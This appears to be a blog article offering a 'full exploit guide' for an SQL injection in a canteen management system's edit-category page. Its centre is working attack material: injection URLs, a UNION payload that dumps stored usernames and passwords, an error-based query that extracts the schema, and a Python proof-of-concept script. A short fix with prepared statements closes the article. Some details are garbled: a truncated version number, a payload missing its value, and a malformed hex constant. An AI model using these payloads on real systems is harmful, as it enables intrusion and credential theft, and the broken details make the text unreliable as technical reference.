CVE-2022-43290 - SQL Injection in Canteen Management System v1. — Full Exploit Guide

In the ever-evolving landscape of cybersecurity, even simple management software can harbor dangerous vulnerabilities. One such case is CVE-2022-43290, a SQL Injection vulnerability found in Canteen Management System v1.. This issue exists in the id parameter of the “edit category” function, located at /youthappam/editcategory.php. In this article, I’ll break down the vulnerability, show you how it can be exploited, discuss the risks, and offer advice on securing your PHP projects.

What Is CVE-2022-43290?

CVE-2022-43290 refers to a security vulnerability (found in 2022) allowing attackers to inject malicious SQL statements through the id parameter in the “edit category” page. If exploited, an attacker could access, modify, or delete confidential database information, take over accounts, or even compromise the entire system.

Product Affected: Canteen Management System v1.

- Vulnerable Endpoint: /youthappam/editcategory.php

Understanding SQL Injection

SQL Injection is a code injection technique that attackers use to exploit vulnerabilities in data-driven applications. If user input is not properly sanitized, malicious users can alter SQL queries and access data they’re not supposed to.

Walking Through the Vulnerability

Let’s consider what happens when the “edit category” page is loaded with an id parameter in the URL:

http://example.com/youthappam/editcategory.php?id=5

A typical (and vulnerable) PHP code snippet might look like this

<?php
// Vulnerable code: No input sanitization!
$id = $_GET['id'];
$query = "SELECT * FROM categories WHERE id = $id";
$result = mysqli_query($conn, $query);
?>

Since $id is taken directly from user input without quotes or sanitization, an attacker can supply any SQL code.

Exploiting the Vulnerability

By manipulating the id parameter, an attacker can execute arbitrary SQL commands.

1. Authentication Bypass (if the results are used in authentication)

http://example.com/youthappam/editcategory.php?id= OR 1=1

The SQL query becomes

SELECT * FROM categories WHERE id =  OR 1=1

Here, 1=1 is always true, so the entire categories table is returned.

Suppose you want to dump usernames and passwords

http://example.com/youthappam/editcategory.php?id=1 UNION SELECT 1, username, password FROM users--

The SQL now

SELECT * FROM categories WHERE id = 1 UNION SELECT 1, username, password FROM users--

This could reveal all usernames and passwords on the application if the result is displayed.

Triggering errors to reveal database structure

http://example.com/youthappam/editcategory.php?id=1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), x3a, FLOOR(RAND()*2)) x FROM information_schema.tables GROUP BY x)a)--

This could display the database name in the error message.

Exploit Code Snippet

Below is a basic Python proof-of-concept exploit using requests and BeautifulSoup (if the page shows results).

import requests

url = "http://target.com/youthappam/editcategory.php";
payload = "1 UNION SELECT 1,username,password FROM users--"

params = {'id': payload}
r = requests.get(url, params=params)

if "admin" in r.text or "password" in r.text:
    print("[+] SQL Injection Successful! Possible data leak.")
    print(r.text)
else:
    print("[-] No data leaked, but possibly still vulnerable.")

Note: Use responsibly and only for authorized testing.

Here is how the code should be improved

<?php
$id = intval($_GET['id']); // Only allow integers
$stmt = $conn->prepare("SELECT * FROM categories WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();
$result = $stmt->get_result();
?>

References

- NVD Entry: CVE-2022-43290
- Exploit Database: 51470
- OWASP SQL Injection Guide
- Canteen Management System v1. Source

Conclusion

CVE-2022-43290 is a classic and dangerous example of what happens when developers don’t sanitize user inputs. Even basic systems like a Canteen Management System can be used for malicious purposes if not properly safeguarded. Patch your code, use prepared statements, and always validate user input. If you’re running this software, update or fix your code immediately to stay secure!


*Stay safe, code responsibly, and always keep learning. If you’re a developer or IT admin, make sure to review all places where user input hits your database!*

Timeline

Published on: 11/09/2022 15:15:00 UTC
Last modified on: 11/10/2022 15:02:00 UTC